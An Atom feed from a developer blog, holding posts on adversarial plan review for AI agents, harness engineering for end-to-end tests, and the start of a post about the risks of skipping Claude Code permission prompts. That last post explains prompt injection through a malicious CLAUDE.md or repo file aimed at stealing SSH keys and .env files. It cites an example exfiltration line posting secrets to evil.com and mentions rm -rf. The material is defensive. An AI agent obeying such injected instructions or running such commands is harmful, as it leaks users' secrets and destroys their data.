<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.10.0">Jekyll</generator><link href="https://stillcuriouscat.com/feed.xml" rel="self" type="application/atom+xml" /><link href="https://stillcuriouscat.com/" rel="alternate" type="text/html" /><updated>2026-10-06T11:04:59+00:00</updated><id>https://stillcuriouscat.com/feed.xml</id><title type="html">stillcuriouscat</title><subtitle>Developer blog about AI tooling, Claude Code, and security</subtitle><author><name>stillcuriouscat</name></author><entry><title type="html">Adversarial Review: Make Your AI Agent’s Plans Fight Before Shipping</title><link href="https://stillcuriouscat.com/posts/adversarial-review-make-ai-plans-fight-before-shipping/" rel="alternate" type="text/html" title="Adversarial Review: Make Your AI Agent’s Plans Fight Before Shipping" /><published>2026-03-06T00:00:00+00:00</published><updated>2026-03-06T00:00:00+00:00</updated><id>https://stillcuriouscat.com/posts/adversarial-review-make-ai-plans-fight-before-shipping</id><content type="html" xml:base="https://stillcuriouscat.com/posts/adversarial-review-make-ai-plans-fight-before-shipping/"><![CDATA[<blockquote>
  <p>AI agent plans always look great on paper — until they hit reality. What if you made agents debate each other first?</p>
</blockquote>

<h2 id="what-this-post-covers">What This Post Covers</h2>

<p>After multiple rounds of “beautiful plan, disastrous execution,” I designed a three-role adversarial plan review method: <strong>Planner proposes → Critic verifies with real commands and rebuts → Judge decides</strong>, iterating until the Critic gives a GO.</p>

<p>I codified this methodology into a reusable Claude Code Skill (<code class="language-plaintext highlighter-rouge">adversarial-review</code>). This post covers two things:</p>

<ol>
  <li><strong>The pain</strong>: Why AI-generated plans are unreliable when unchallenged</li>
  <li><strong>The methodology</strong>: 6 core design principles of adversarial review, and how to turn it into a Skill</li>
</ol>

<hr />

<h2 id="part-1-the-pain--why-ai-plans-keep-failing">Part 1: The Pain — Why AI Plans Keep Failing</h2>

<h3 id="common-failure-patterns">Common Failure Patterns</h3>

<p>After working on several system-level projects with Claude Code, I noticed a pattern: <strong>AI plans are always correct on paper, but break when they meet reality.</strong></p>

<p>Common failure scenarios:</p>
<ul>
  <li>AI assumes a system resource is available (file path, permission) — it’s actually occupied or doesn’t exist</li>
  <li>AI introduces tools or rules that conflict with the system’s existing configuration, breaking things that were working fine</li>
  <li>Simple requirements get over-engineered — a problem solvable with one script gets a multi-component architecture</li>
</ul>

<p>The common thread: <strong>AI designs plans based on assumptions without checking the real environment first.</strong></p>

<h3 id="root-causes">Root Causes</h3>

<p>Common problems when AI agents generate plans:</p>

<table>
  <thead>
    <tr>
      <th>Problem</th>
      <th>Manifestation</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td><strong>Unverified assumptions</strong></td>
      <td>Assumes permissions exist, assumes tools are installed</td>
    </tr>
    <tr>
      <td><strong>No alternative search</strong></td>
      <td>Designs from scratch without checking for existing tools</td>
    </tr>
    <tr>
      <td><strong>Over-engineering</strong></td>
      <td>Piles complex architecture onto simple requirements</td>
    </tr>
    <tr>
      <td><strong>Sunk cost fallacy</strong></td>
      <td>Patches broken plans instead of starting over</td>
    </tr>
  </tbody>
</table>

<p>One-line summary: <strong>AI is great at generating plans, but terrible at questioning them.</strong></p>

<hr />

<h2 id="part-2-the-methodology--three-role-adversarial-review">Part 2: The Methodology — Three-Role Adversarial Review</h2>

<h3 id="core-idea">Core Idea</h3>

<blockquote>
  <p>“I need a planning team, an opposing review team, and a judge. Propose a plan, the opposition counters, propose a revised plan, the opposition counters again, the judge coordinates. Iterate like this for several rounds to reach a better solution. Because this is just too complex, and I’ve been burned by failed plans before.”</p>
</blockquote>

<p>This borrows from the security world’s Red Team / Blue Team model, with one crucial constraint: <strong>the Critic must verify with real commands — no purely theoretical critiques allowed.</strong></p>

<h3 id="three-roles">Three Roles</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>┌─────────┐     PLAN_R1.md      ┌─────────┐
│ Planner │ ──────────────────→ │  Critic │
│ (Agent) │                     │ (Agent) │
└────┬────┘                     └────┬────┘
     │                               │
     │  ← CRITIQUE_R1.md ───────────┘
     │         (NO-GO)
     │                          ┌─────────┐
     └─── Revised PLAN_R2.md ─→│  Judge  │
                                │  (main) │
                                └─────────┘
                                     │
                              verdict + loop mgmt
</code></pre></div></div>

<table>
  <thead>
    <tr>
      <th>Role</th>
      <th>Who</th>
      <th>What They Do</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td><strong>Planner</strong></td>
      <td>Agent (subprocess)</td>
      <td>Search for existing tools → probe system → write evidence-based plan</td>
    </tr>
    <tr>
      <td><strong>Critic</strong></td>
      <td>Agent (subprocess)</td>
      <td>Run real commands to verify plan → search community for known pitfalls → write critique</td>
    </tr>
    <tr>
      <td><strong>Judge</strong></td>
      <td>Main session</td>
      <td>Read both files → issue verdict → manage iteration → detect user annotations</td>
    </tr>
    <tr>
      <td><strong>User</strong></td>
      <td>Me</td>
      <td>Final authority: review files, annotate directly in the plan</td>
    </tr>
  </tbody>
</table>

<h3 id="6-core-design-principles">6 Core Design Principles</h3>

<h4 id="design-1-planner-searches-for-existing-wheels-first">Design 1: Planner Searches for Existing Wheels First</h4>

<p>The traditional approach: AI receives requirements → immediately starts designing architecture.</p>

<p>My approach: AI receives requirements → <strong>first searches for existing open-source projects or CLI tools that can be used or adapted</strong> → evaluates whether to use as dependency / extract core logic / borrow patterns → then designs on top of existing foundations.</p>

<p>It’s like building with blocks — check if suitable blocks exist before molding from clay.</p>

<p>Equally important: the Planner must <strong>probe the real system environment</strong>. Designing without probing is like drawing blueprints blindfolded.</p>

<h4 id="design-2-both-sides-must-verify-on-machine--search">Design 2: Both Sides Must Verify On-Machine + Search</h4>

<p>It’s not just the Critic who runs commands — <strong>the Planner must also run commands to probe the current system state.</strong> The difference lies in intent:</p>

<table>
  <thead>
    <tr>
      <th> </th>
      <th>Planner’s Investigation</th>
      <th>Critic’s Investigation</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td><strong>Nature</strong></td>
      <td>Exploratory (discover what exists)</td>
      <td>Verificatory (check if claims hold)</td>
    </tr>
    <tr>
      <td><strong>Bash</strong></td>
      <td>Probe system state, permissions</td>
      <td>Verify each claim in the plan</td>
    </tr>
    <tr>
      <td><strong>Search</strong></td>
      <td>Search for existing tools, best practices</td>
      <td>Search community issues, known pitfalls</td>
    </tr>
    <tr>
      <td><strong>Purpose</strong></td>
      <td>Build a model (generate hypotheses)</td>
      <td>Break the model (test hypotheses)</td>
    </tr>
  </tbody>
</table>

<p>This is fundamentally the scientific method: hypothesis generation vs hypothesis testing.</p>

<h4 id="design-3-user-annotations-in-plan-files--blocker">Design 3: User Annotations in Plan Files = BLOCKER</h4>

<p>After the Planner writes a plan, I annotate the markdown file directly. These annotations are BLOCKER-level feedback — the Judge must detect them (via diff) and route them back to the Planner before the Critic even reviews.</p>

<p>Why? Automated Critics can find technical bugs, but they can’t find domain-knowledge design flaws. For example:</p>
<ul>
  <li>The plan depends on an upstream component whose status is still undecided — the Critic doesn’t know this</li>
  <li>A tool categorizes data by “physical name,” but in practice the same physical name maps to different logical meanings — the Critic doesn’t understand the business semantics</li>
</ul>

<p>Only the user can catch these issues. User annotations take priority over any Critic conclusion.</p>

<h4 id="design-4-severity-levels--structured-verdict">Design 4: Severity Levels + Structured Verdict</h4>

<p>The Critic’s output isn’t free-form text — it’s structured:</p>

<table>
  <thead>
    <tr>
      <th>Level</th>
      <th>Code</th>
      <th>Meaning</th>
      <th>Impact on Verdict</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>CRITICAL</td>
      <td>C1, C2…</td>
      <td>Must fix</td>
      <td>Any present → cannot GO</td>
    </tr>
    <tr>
      <td>MEDIUM</td>
      <td>M1, M2…</td>
      <td>Needs decision</td>
      <td>Can CONDITIONAL GO</td>
    </tr>
    <tr>
      <td>LOW</td>
      <td>L1, L2…</td>
      <td>Code quality</td>
      <td>No impact on Verdict</td>
    </tr>
  </tbody>
</table>

<p>Every issue must include: description → trigger scenario → <strong>verification evidence (command output)</strong> → proposed fix → cost/tradeoff.</p>

<p>Three possible verdicts:</p>
<ul>
  <li><strong>GO</strong>: Ready to implement</li>
  <li><strong>CONDITIONAL GO</strong>: With a condition table (condition + effort estimate + priority)</li>
  <li><strong>NO-GO</strong>: Fundamental design problem, needs rewrite</li>
</ul>

<h4 id="design-5-e2e-harness-integration--define-what-success-looks-like-first">Design 5: e2e-harness Integration — Define “What Success Looks Like” First</h4>

<p>A plan can’t just say “I’ll build X” — it must also say “how to verify X works.”</p>

<p>I chained adversarial-review with a previously built e2e-harness skill:</p>
<ul>
  <li><strong>e2e-harness</strong> defines “what success looks like” (verification plan)</li>
  <li><strong>adversarial-review</strong> defines “how to achieve success” (implementation plan)</li>
</ul>

<p>If the project doesn’t have e2e harness artifacts yet (<code class="language-plaintext highlighter-rouge">boundary_map.json</code>, <code class="language-plaintext highlighter-rouge">e2e_features.json</code>), the skill reminds you to run <code class="language-plaintext highlighter-rouge">/e2e-harness</code> first. This turns “verification” from an afterthought into a <strong>plan input</strong>.</p>

<h4 id="design-6-no-implementation-until-the-plan-is-finalized">Design 6: No Implementation Until the Plan Is Finalized</h4>

<p>This is the simplest but most important rule.</p>

<p>I’ve had cases where Claude started writing code immediately after the Critic gave a CONDITIONAL GO. The problem: the plan hadn’t been finalized by me yet, and the tradeoffs in the conditions hadn’t been discussed.</p>

<p>So the skill has a hard rule: <strong>no automatic coding after GO.</strong> The purpose of planning is to align direction, not to auto-trigger implementation.</p>

<hr />

<h2 id="part-3-codifying-it-as-a-skill">Part 3: Codifying It as a Skill</h2>

<p>The methodology works, but manually orchestrating agents every time, explaining that the Critic must run commands, defining output formats — it’s tedious. So I codified it into a Claude Code Skill.</p>

<h3 id="file-structure">File Structure</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>~/.claude/skills/adversarial-review/
├── SKILL.md              # Main workflow + graphviz flowchart (~460 words)
├── planner-prompt.md      # Planner agent prompt template
├── critic-prompt.md       # Critic agent prompt template (IRON RULE)
└── artifact-templates.md  # Plan/Critique output format templates
</code></pre></div></div>

<p>Usage: <code class="language-plaintext highlighter-rouge">/adversarial-review &lt;topic&gt;</code></p>

<h3 id="key-design-the-critics-iron-rule">Key Design: The Critic’s IRON RULE</h3>

<p>The Critic prompt contains one iron law:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Pure theoretical critique is WORTHLESS.
Every issue you raise MUST cite:
  (a) a command you ran + its actual output, OR
  (b) a search result (URL + key finding)

If you cannot verify something, write:
  "UNVERIFIABLE: &lt;reason&gt;"
Do NOT pretend to verify.
</code></pre></div></div>

<p>This eliminates vague objections like “this might be a problem.” The Critic either proves there’s a problem, or stays silent.</p>

<h3 id="toolchain">Toolchain</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/e2e-harness          →  Define "what success looks like"
      ↓
/adversarial-review   →  Define "how to achieve success"
      ↓
Implementation        →  Only after plan is finalized and user confirms
</code></pre></div></div>

<hr />

<h2 id="conclusion-when-to-use-adversarial-review">Conclusion: When to Use Adversarial Review</h2>

<table>
  <thead>
    <tr>
      <th>Scenario</th>
      <th>Use It?</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Fixing a typo, adding a log</td>
      <td>No</td>
    </tr>
    <tr>
      <td>New feature involving system services/permissions/multiple components</td>
      <td><strong>Yes</strong></td>
    </tr>
    <tr>
      <td>A similar approach has failed before</td>
      <td><strong>Yes</strong></td>
    </tr>
    <tr>
      <td>You have gut-level distrust of the AI’s plan</td>
      <td><strong>Yes</strong></td>
    </tr>
    <tr>
      <td>The plan looks too smooth</td>
      <td><strong>Yes</strong> — the smoother it looks, the more you should doubt it</td>
    </tr>
  </tbody>
</table>

<p>Core principle: <strong>AI is great at generating plans, but terrible at questioning them. So let another AI do the questioning — with real evidence, not hand-waving.</strong></p>]]></content><author><name>stillcuriouscat</name></author><category term="Engineering" /><category term="adversarial-review" /><category term="claude-code" /><category term="ai-agents" /><category term="planning" /><category term="skills" /><category term="methodology" /><summary type="html"><![CDATA[AI agent plans always look great on paper — until they hit reality. I designed a three-role adversarial review method (Planner → Critic → Judge) and codified it into a reusable Claude Code Skill.]]></summary></entry><entry><title type="html">Harness Engineering: From Principles to Practice</title><link href="https://stillcuriouscat.com/posts/harness-engineering-from-principles-to-practice/" rel="alternate" type="text/html" title="Harness Engineering: From Principles to Practice" /><published>2026-03-02T00:00:00+00:00</published><updated>2026-03-02T00:00:00+00:00</updated><id>https://stillcuriouscat.com/posts/harness-engineering-from-principles-to-practice</id><content type="html" xml:base="https://stillcuriouscat.com/posts/harness-engineering-from-principles-to-practice/"><![CDATA[<blockquote>
  <p>When your AI agent writes “E2E tests” full of mocks, how do you teach it to verify real environmental state?</p>
</blockquote>

<h2 id="what-this-post-covers">What This Post Covers</h2>

<p>Harness Engineering emerged in late 2025 as a new discipline: <strong>instead of writing better prompts, build better environments</strong>. OpenAI, Anthropic, and independent voices like Mitchell Hashimoto and Martin Fowler contributed foundational ideas from different angles.</p>

<p>While building end-to-end tests for a Linux voice input tool, I synthesized these ideas into a Claude Code Skill (a reusable AI agent instruction template) and iteratively tested it until it reliably guided agents to do the right thing. This post covers three levels:</p>

<ol>
  <li><strong>The core ideas of Harness Engineering</strong> — what each source contributes, and where they converge</li>
  <li><strong>My interpretation</strong> — which ideas matter most for hardware-interactive projects</li>
  <li><strong>Practice: encoding principles into a Skill</strong> — how to turn methodology into executable agent instructions, and the traps I found along the way</li>
</ol>

<hr />

<h2 id="part-1-core-ideas-of-harness-engineering">Part 1: Core Ideas of Harness Engineering</h2>

<h3 id="what-is-a-harness">What Is a Harness</h3>

<p>Test harnesses aren’t new, but 2025 gave them new meaning in the AI agent context: <strong>not testing your code, but building an environment where AI agents can reliably produce correct results</strong>.</p>

<p>Traditional test harnesses ask “is the code correct?” Agent harnesses ask “can the agent consistently succeed in this environment?”</p>

<h3 id="three-key-contributions">Three Key Contributions</h3>

<p><strong>OpenAI — Linter as Teacher</strong></p>

<p>OpenAI’s Codex project shipped ~1 million lines of code with 3 engineers + AI agents. Their core insight: custom linter error messages aren’t just errors — they’re <strong>teaching moments</strong>. Every linter message includes remediation instructions, so when an agent violates an architectural constraint, it immediately learns how to fix it.</p>

<p>This transforms passive constraints (“you can’t do this”) into active guidance (“you should do this instead, because…”).</p>

<p><strong>Anthropic — Outcome Over Trace + JSON Checklist</strong></p>

<p>Anthropic contributed two critical ideas across two engineering blog posts:</p>

<ul>
  <li>
    <p><strong>Outcome vs Trace</strong> (from <a href="https://www.anthropic.com/engineering/demystifying-evals-for-ai-agents">Demystifying Evals</a>): Evaluate agents by <strong>final environmental state</strong> (does a reservation exist in the database?), not by process (did the agent call the booking API?). Agents frequently discover valid approaches that evaluators didn’t anticipate — penalizing creative solutions damages assessment quality.</p>
  </li>
  <li>
    <p><strong>JSON &gt; Markdown</strong> (from <a href="https://www.anthropic.com/engineering/effective-harnesses-for-long-running-agents">Effective Harnesses</a>): Track feature checklists in JSON rather than Markdown because agents are less likely to accidentally modify or overwrite JSON files. Agents modify only the <code class="language-plaintext highlighter-rouge">passes</code> field, preventing accidental deletion of requirements.</p>
  </li>
  <li>
    <p><strong>Session Startup Ritual</strong>: Every new session follows a fixed onboarding sequence — confirm working directory, review git logs, read progress files, run baseline tests — preventing agents from reinventing context.</p>
  </li>
</ul>

<p><strong>Mitchell Hashimoto — Every Failure Is a Design Input</strong></p>

<p>This may be the most powerful single idea. In traditional engineering, a test failure means the code has a bug. In harness engineering, a test failure equally likely means <strong>the framework itself needs improvement</strong> — add logging, add checkpoints, improve documentation. Failures aren’t bugs to fix; they’re data that drives framework evolution.</p>

<h3 id="the-convergence">The Convergence</h3>

<p>Synthesizing these sources, a consistent pattern emerges:</p>

<table>
  <thead>
    <tr>
      <th>Dimension</th>
      <th>Traditional Testing</th>
      <th>Harness Engineering</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Goal</td>
      <td>Verify code correctness</td>
      <td>Enable agents to work reliably</td>
    </tr>
    <tr>
      <td>Failure means</td>
      <td>Code has a bug</td>
      <td>Framework needs improvement</td>
    </tr>
    <tr>
      <td>Tool’s role</td>
      <td>Enforce constraints</td>
      <td>Teach + guide</td>
    </tr>
    <tr>
      <td>Progress tracking</td>
      <td>Human-written docs</td>
      <td>Machine-readable JSON</td>
    </tr>
    <tr>
      <td>Evaluation criteria</td>
      <td>Was the function called?</td>
      <td>Did the environment state change?</td>
    </tr>
  </tbody>
</table>

<hr />

<h2 id="part-2-my-interpretation">Part 2: My Interpretation</h2>

<h3 id="why-outcome-over-trace-is-existential-for-hardware-projects">Why “Outcome Over Trace” Is Existential for Hardware Projects</h3>

<p>My project is a Linux global voice input tool: press hotkey, record from microphone, transcribe via ASR model, type text into Kitty terminal. The pipeline involves audio hardware, PulseAudio, X11 window system, terminal emulators — all system-level I/O.</p>

<p>The lesson that taught me this principle the hard way: I asked Claude to write “E2E tests.” It mocked xdotool, mocked the terminal — unit tests all green. But when I actually ran it, the terminal received nothing. Mocks had hidden hardware routing issues.</p>

<p><strong>Outcome Over Trace is a survival-level principle in this context:</strong></p>

<ul>
  <li>“xdotool key ctrl+v was called” = Trace (the keystroke may never reach the target window)</li>
  <li>“New text appeared in Kitty terminal scrollback” = Outcome (this is what the user actually cares about)</li>
</ul>

<h3 id="two-layer-testing-real-e2e-is-irreplaceable">Two-Layer Testing: Real E2E Is Irreplaceable</h3>

<p>Based on this lesson, I split E2E into two layers:</p>

<ul>
  <li><strong>L1 Real E2E</strong>: Real hardware — <code class="language-plaintext highlighter-rouge">paplay</code> plays audio through speakers, microphone picks it up, <code class="language-plaintext highlighter-rouge">arecord</code> records, ASR transcribes, <code class="language-plaintext highlighter-rouge">kitty @ send-text</code> types, <code class="language-plaintext highlighter-rouge">kitty @ get-text</code> verifies scrollback. Few tests (3-5), failure = blocking.</li>
  <li><strong>L2 Virtual E2E</strong>: Virtual devices — PulseAudio null sink, mock sockets. Many scenarios (10-20+), optional.</li>
</ul>

<p>L2 cannot replace L1. Virtual devices may mask hardware routing issues (like PulseAudio source/sink configuration). But L2 provides broader coverage. They’re complementary.</p>

<h3 id="failure-driven-framework-evolution">Failure-Driven Framework Evolution</h3>

<p>Mitchell Hashimoto’s principle isn’t motivational — it’s a concrete engineering method.</p>

<p>A common failure classification goes: test bug → fix the test, missing instrumentation → add logging, environment issue → update pre_checks, application bug → report to developer. Looks structured, but <strong>the “fix the test” branch is extremely dangerous</strong>.</p>

<p>This is exactly the trap I fell into earlier: the agent wrote mock-based “E2E tests” that all passed green, but the terminal received nothing in practice. A passing test doesn’t mean the feature works — fixing a test to make it pass just hides the failure. Agents naturally gravitate toward the path of least resistance, and “fix the test” is much easier than “fix the application,” so they’ll default to modifying tests even when the bug is in the application.</p>

<p><strong>The correct approach: always suspect the application first, suspect the test last.</strong> Concretely:</p>

<ol>
  <li>Read logs/traces for diagnosis (traces are for <strong>diagnosis</strong>, not pass/fail)</li>
  <li><strong>Start by assuming it’s an application bug</strong> — manually verify whether environmental state matches expectations</li>
  <li>Only consider the test itself as faulty when you’ve confirmed the environmental state is correct but the test still reports failure</li>
  <li>Any test modification must include justification: “because environmental state X is correct, but the test expected Y, and Y is unreasonable because…”</li>
</ol>

<p>In other words: <strong>the test is the prosecutor, the application is the defendant. When evidence is insufficient, investigate the application more — don’t overturn the prosecution’s case.</strong></p>

<hr />

<h2 id="part-3-practice--encoding-principles-into-a-skill">Part 3: Practice — Encoding Principles into a Skill</h2>

<h3 id="why-make-it-a-skill">Why Make It a Skill</h3>

<p>Principles in a blog post make people nod. But AI agents don’t automatically follow them. I needed a way to turn methodology into <strong>executable instructions</strong> that agents follow every time they set up E2E tests.</p>

<p>Claude Code’s Skill mechanism solves this: a Markdown file that auto-loads when the agent encounters a matching scenario, with instructions that directly shape agent behavior.</p>

<h3 id="skill-structure">Skill Structure</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>~/.claude/skills/e2e-harness/SKILL.md (1312 words)

Core Principles:  P1 Outcome Over Trace / P2 Two-Layer / P3 Failures = Design Inputs
                  P4 JSON Checklist / P7 Structural Verification

Execution Flow:   Phase 1 (Analyze I/O boundaries) → 1.5 (User confirmation)
                  → 2 (Research tools) → 3 (Instrument code)
                  → 4 (Generate tests) → 5 (Run → fail → improve → loop)

Common Mistakes:  6 anti-patterns
Tool Catalog:     13 pre-audited tools
</code></pre></div></div>

<h3 id="testing-the-skill-using-the-weakest-model-as-a-unit-test">Testing the Skill: Using the Weakest Model as a “Unit Test”</h3>

<p>After writing the Skill, I tested it with Haiku (the smallest model in the Claude family). The logic: <strong>if the weakest model can follow the instructions, the instructions are clear enough</strong>.</p>

<h4 id="round-1-baseline-vs-skill-injected">Round 1: Baseline vs Skill-Injected</h4>

<table>
  <thead>
    <tr>
      <th>Dimension</th>
      <th>No Skill (Baseline)</th>
      <th>With Skill</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Methodology</td>
      <td>Unstructured, jumps to writing tests</td>
      <td>Follows Phase 1→1.5→2→3→4→5</td>
    </tr>
    <tr>
      <td>P1 compliance</td>
      <td>Not mentioned</td>
      <td>Verifies scrollback diff, RMS values, file state</td>
    </tr>
    <tr>
      <td>L1/L2 distinction</td>
      <td>None</td>
      <td>Clear separation</td>
    </tr>
    <tr>
      <td>User confirmation</td>
      <td>None</td>
      <td>Lists 5 confirmation questions</td>
    </tr>
    <tr>
      <td>boundary_map.json</td>
      <td>None</td>
      <td>Complete output</td>
    </tr>
  </tbody>
</table>

<p>Clear improvement. But I found a problem —</p>

<h4 id="the-trap-trace-based-verification-in-l2-virtual-e2e">The Trap: Trace-Based Verification in L2 Virtual E2E</h4>

<p>The skill-guided agent handled L1 Real E2E perfectly, but in L2 Virtual E2E it wrote:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Agent's L2 verification code
</span><span class="n">socket_commands</span> <span class="o">=</span> <span class="n">mock_kitty_socket</span><span class="p">.</span><span class="n">get_received_commands</span><span class="p">()</span>  <span class="c1"># &lt;-- Trace!
</span><span class="k">assert</span> <span class="nb">len</span><span class="p">(</span><span class="n">socket_commands</span><span class="p">)</span> <span class="o">&gt;</span> <span class="mi">0</span>  <span class="c1"># Checking if mock received calls
</span></code></pre></div></div>

<p>This violates P1! “Mock received a send-text call” is a trace, not an outcome. The correct approach is for the mock to maintain a text buffer and verify the buffer’s content.</p>

<h4 id="why-the-agent-made-this-mistake">Why the Agent Made This Mistake</h4>

<p>Analysis revealed: while Common Mistakes included “don’t do trace-based verification,” this was a <strong>negative instruction</strong> (“don’t do X”). The agent read it, understood it should avoid this, but still slipped into the pattern during code generation — because at the critical moment of generating L2 test code, there wasn’t a strong enough <strong>positive instruction</strong> telling it what to do instead.</p>

<h4 id="the-fix-positive-instructions--self-check-trigger-words">The Fix: Positive Instructions + Self-Check Trigger Words</h4>

<p>I added this paragraph to the Phase 4 L2 section:</p>

<blockquote>
  <p>Virtual mocks must produce <strong>readable output state</strong>, not just record calls. A mock Kitty socket must maintain a text buffer that <code class="language-plaintext highlighter-rouge">get-text</code> reads back — verify that buffer, not the list of received commands. If your verify step uses words like “received”, “called”, “invoked”, or “recorded”, you are checking traces — rewrite to check state.</p>
</blockquote>

<p>Key design choices:</p>
<ul>
  <li><strong>Positive instruction</strong>: “mock must maintain a text buffer, verify the buffer” (what to do)</li>
  <li><strong>Self-check trigger words</strong>: “if your verify step contains received/called/invoked/recorded, you’re checking traces” (how to know you’re wrong)</li>
</ul>

<p>This places a mirror in front of the agent at the exact moment it generates code.</p>

<h4 id="round-2-pass">Round 2: Pass</h4>

<p>After the patch, retesting with Haiku produced fully state-based <code class="language-plaintext highlighter-rouge">verify_output()</code>:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Agent's L2 verification code after patch
</span><span class="n">mock_buffer</span> <span class="o">=</span> <span class="n">mock_kitty_socket</span><span class="p">.</span><span class="n">get_text_buffer</span><span class="p">()</span>  <span class="c1"># State!
</span><span class="k">assert</span> <span class="n">expected_text</span> <span class="ow">in</span> <span class="n">mock_buffer</span>  <span class="c1"># Verifying buffer content
</span></code></pre></div></div>

<p>The agent even proactively marked <code class="language-plaintext highlighter-rouge">_call_log</code> as “diagnosis only, NOT for pass/fail” — indicating the instruction was genuinely understood, not just pattern-matched.</p>

<h3 id="methodology-summary-how-to-write-effective-ai-instructions">Methodology Summary: How to Write Effective AI Instructions</h3>

<p>Principles distilled from this practice:</p>

<table>
  <thead>
    <tr>
      <th>Principle</th>
      <th>Description</th>
      <th>Example</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td><strong>Dual constraint: negative + positive</strong></td>
      <td>“Don’t do X” isn’t enough — also say “Do Y”</td>
      <td>“Don’t check mock calls” + “Check the mock’s output buffer”</td>
    </tr>
    <tr>
      <td><strong>Self-check trigger words</strong></td>
      <td>Give agents a quick heuristic for self-correction</td>
      <td>“If verify contains received/called, it’s a trace”</td>
    </tr>
    <tr>
      <td><strong>Test with the weakest model</strong></td>
      <td>If Haiku can follow it, the instruction is clear</td>
      <td>Haiku subagent A/B comparison with/without Skill</td>
    </tr>
    <tr>
      <td><strong>Place instructions at the critical moment</strong></td>
      <td>Don’t just state principles at the top — repeat at code generation point</td>
      <td>Emphasize P1 in Phase 4 L2 section, not just Principles</td>
    </tr>
  </tbody>
</table>

<p>This is fundamentally the same idea as OpenAI’s “Linter as Teacher”: <strong>don’t just tell agents the rules — give correction instructions at the moment they make mistakes</strong>. Linters do this at compile time; Skills do this in the code generation prompt.</p>

<hr />

<h2 id="conclusion">Conclusion</h2>

<p>The core of Harness Engineering isn’t a specific toolset — it’s a mindset shift:</p>

<ul>
  <li>From “testing code” to “building environments where agents can work reliably”</li>
  <li>From “test failure = bug” to “test failure = framework evolution opportunity”</li>
  <li>From “writing prompts” to “encoding principles into environmental constraints”</li>
</ul>

<p>For projects involving hardware I/O (audio, terminals, GPUs, networks), this mindset is especially critical — because mocks can fool agents, but they can’t fool physics.</p>

<hr />

<h2 id="references">References</h2>

<ul>
  <li><a href="https://openai.com/index/harness-engineering/">OpenAI: Harness Engineering</a> — Linter as teacher, 3 engineers + Codex = 1M lines</li>
  <li><a href="https://www.anthropic.com/engineering/effective-harnesses-for-long-running-agents">Anthropic: Effective Harnesses for Long-Running Agents</a> — JSON checklist, session startup ritual</li>
  <li><a href="https://www.anthropic.com/engineering/demystifying-evals-for-ai-agents">Anthropic: Demystifying Evals for AI Agents</a> — Outcome vs Trace, grader taxonomy</li>
  <li><a href="https://www.ignorance.ai/p/the-emerging-harness-engineering">The Emerging “Harness Engineering” Playbook</a> — Cross-company synthesis</li>
  <li><a href="https://martinfowler.com/articles/exploring-gen-ai/harness-engineering.html">Martin Fowler: Harness Engineering</a> — Architecture as guardrails</li>
  <li>Mitchell Hashimoto: “Every failure is a design input”</li>
  <li>James Shore: Testing Without Mocks (Nullable Infrastructure)</li>
  <li>Martin Fowler: Domain Probe Pattern</li>
</ul>]]></content><author><name>stillcuriouscat</name></author><category term="Engineering" /><category term="harness-engineering" /><category term="e2e-testing" /><category term="claude-code" /><category term="ai-agents" /><category term="evals" /><category term="testing-methodology" /><category term="skills" /><summary type="html"><![CDATA[When your AI agent writes 'E2E tests' full of mocks, how do you teach it to verify real environmental state? A synthesis of OpenAI, Anthropic, and Mitchell Hashimoto's ideas — plus lessons from encoding these principles into a Claude Code Skill.]]></summary></entry><entry><title type="html">Permission Patrol: An AI Security Guard for Claude Code</title><link href="https://stillcuriouscat.com/posts/permission-patrol-ai-security-guard-for-claude-code/" rel="alternate" type="text/html" title="Permission Patrol: An AI Security Guard for Claude Code" /><published>2026-02-06T00:00:00+00:00</published><updated>2026-02-06T00:00:00+00:00</updated><id>https://stillcuriouscat.com/posts/permission-patrol-ai-security-guard-for-claude-code</id><content type="html" xml:base="https://stillcuriouscat.com/posts/permission-patrol-ai-security-guard-for-claude-code/"><![CDATA[<h2 id="why---dangerously-skip-permissions-is-dangerous">Why <code class="language-plaintext highlighter-rouge">--dangerously-skip-permissions</code> Is Dangerous</h2>

<p>Many developers run Claude Code with <code class="language-plaintext highlighter-rouge">--dangerously-skip-permissions</code> to avoid the constant permission prompts. It’s tempting — no interruptions, fully autonomous coding. But you’re giving an AI agent <strong>unrestricted access</strong> to your filesystem, network, and shell.</p>

<p>Here’s what can go wrong:</p>

<ul>
  <li><strong>Accidental file deletion.</strong> Claude might run <code class="language-plaintext highlighter-rouge">rm -rf</code> on the wrong directory, or a script it generates calls <code class="language-plaintext highlighter-rouge">shutil.rmtree()</code> on a path outside your project. With no permission check, it just happens.</li>
  <li><strong>Prompt injection.</strong> A malicious <code class="language-plaintext highlighter-rouge">CLAUDE.md</code> or a crafted file in a cloned repo can instruct Claude to exfiltrate your SSH keys, <code class="language-plaintext highlighter-rouge">.env</code> files, or source code. With <code class="language-plaintext highlighter-rouge">--dangerously-skip-permissions</code>, there’s nothing stopping it.</li>
  <li><strong>Unreviewed scripts.</strong> Claude generates and runs Python/Node/Bash scripts all the time. Without permission checks, you never see what’s inside — even if the script contains <code class="language-plaintext highlighter-rouge">requests.post("https://evil.com", data=secrets)</code>.</li>
</ul>

<p>The manual alternative isn’t great either. Clicking “Allow” on every permission prompt means you’re reviewing hundreds of requests per session. Most people stop reading after the first few — which means <strong>long bash chains</strong> and <strong>innocent-looking script names</strong> slip through without real scrutiny.</p>

